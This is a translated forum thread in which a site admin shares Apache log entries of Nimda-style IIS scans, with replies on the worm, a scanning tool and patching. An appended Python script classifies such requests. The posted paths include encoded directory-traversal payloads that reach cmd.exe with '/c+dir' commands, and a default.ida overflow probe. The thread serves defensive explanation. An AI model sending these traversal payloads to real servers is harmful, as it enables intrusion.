校長兼撞鐘 | Quite a lot of idiots like to randomly scan hosts

I was bored and took a look at the Apache log file. There are bored people from the US / mainland China randomly scanning the host. If you are going to hack a host, you should at least find out the other host's OS first. I run a Unix OS, yet they all try to break in using NT methods..... Those of you running NT, check whether the directories below contain these exe files; if they do, please watch out.

```
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/root.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/MSADC/root.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/c/winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/d/winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..Á../winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..À‾../winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..Áœ../winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..%2f../winnt/system32/cmd.exe
```
想到再告訴你嚕 | Re: Quite a lot of idiots like to randomly scan hosts

errrrr, unrelated to the topic... I just think that little girl is so cute.. Is she 土大's daughter?..
Member | Brother 阿土, it could be a computer infected with nimda that is scanning PCs on the internet. Its owner probably doesn't even know ^^!
進 | Re: Quite a lot of idiots like to randomly scan hosts Quote:
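Member | Over in mainland China they have put out a host-scanning program called 流光. It automatically scans for the vulnerabilities your computer has. The program itself has a restriction: it seems it cannot scan IPs inside mainland China. Its documentation says domestic IPs (meaning the mainland) are reserved, but it can scan IPs over here in Taiwan. I have also used this program to scan my own host. It finds your telnet, pop3, sendmail, ftp and other information about the ports you have open, and it uses something like a password file to brute-force accounts that use idiotic passwords. Basically the program by default scans both Un*X and Win hosts, which is why it leaves /script/xxxx and similar entries in your Apache log file...

I would advise admins who use IIS as their web server to pay close attention to Microsoft's vulnerability updates. Right now a lot of vulnerabilities target IIS, so you are on your own.. otherwise one day you will get hacked without even knowing it...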
Member | But the log Brother 阿土 posted was very clearly left by an attack from a PC infected with nimda; I don't think it is some other intrusion program.
Member | That's right. The log file provided by site admin 阿土 shows nimda probing. You can compile it and report it to the telecommunications police.
Member | Danger lurks everywhere; I had better wait until my skills are better before setting up a site.
Member | This is the site report from the overseas host I rent; I really can't tell what they are scanning for??

```
File not find Report
/scripts/..%255c../winnt/system32/cmd.exe
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/scripts/root.exe
/scripts/root.exe?/c+dir
/scripts/..%5c../winnt/system32/cmd.exe
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir
/MSADC/root.exe
/MSADC/root.exe?/c+dir
/c/winnt/system32/cmd.exe
/c/winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe
/d/winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.e...
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.e...
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.e...
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.e...
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%...
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%...
/scripts/..%c1%1c../winnt/system32/cmd.exe
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/winnt/system32/cmd.exe
/scripts/winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%252f../winnt/system32/cmd.exe
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
/default.ida
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN...
/robots.txt
```
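An added example, not part of the thread: a small Python classifier for the request paths posted above, showing that the `%255c`, `%c0%af`, `%c1%1c` and `%c1%9c` variants all reduce to the same `../` traversal toward `cmd.exe` once decoded leniently. The tag names, the `192.0.2.x` addresses and the sample lines are constructed for illustration; the log format and document root are the ones in the first post.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

DOCROOT = "/usr/local/apache/htdocs"  # document root shown in the thread's log
LINE = re.compile(r"\[client (?P<ip>[\d.]+)\] File does not exist: (?P<path>\S+)")

def fold(raw: bytes) -> str:
    """Decode like a lenient server: a 0xC0/0xC1 lead byte plus the next
    byte collapses to one ASCII character (0xC0 0xAF becomes '/')."""
    out, i = [], 0
    while i < len(raw):
        if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(chr((raw[i] & 0x1F) << 6 | raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(chr(raw[i]))
            i += 1
    return "".join(out)

def classify(path: str) -> set:
    """Return tags (names chosen for this example) describing a request path."""
    tags = set()
    once = unquote_to_bytes(path)
    twice = unquote_to_bytes(once)
    if twice != once:                            # e.g. %255c -> %5c -> backslash
        tags.add("double-encoded")
    if re.search(rb"[\xc0\xc1].", twice, re.S):  # bytes never valid in UTF-8
        tags.add("overlong-utf8")
    plain = fold(twice).replace("\\", "/").lower()
    if "../" in plain:
        tags.add("traversal")
    if plain.split("?")[0].endswith(("/cmd.exe", "/root.exe")):
        tags.add("shell-probe")
    return tags

def summarize(lines):
    """Count tags per client over error_log lines in the thread's format."""
    hits = defaultdict(lambda: defaultdict(int))
    for m in filter(None, map(LINE.search, lines)):
        path = m["path"][len(DOCROOT):] if m["path"].startswith(DOCROOT) else m["path"]
        for tag in classify(path):
            hits[m["ip"]][tag] += 1
    return {ip: dict(tags) for ip, tags in hits.items()}

# Constructed sample lines; 192.0.2.x is a documentation address range.
P = "[client 192.0.2.10] File does not exist: " + DOCROOT
SAMPLE = [P + "/scripts/root.exe",
          P + "/scripts/..%255c../winnt/system32/cmd.exe",
          P + "/scripts/..%c0%af../winnt/system32/cmd.exe",
          "[client 192.0.2.77] File does not exist: " + DOCROOT + "/favicon.ico"]

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

On a Unix Apache host these requests only produce 404s; the per-client summary is useful mainly for spotting which source addresses are infected or scanning.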
|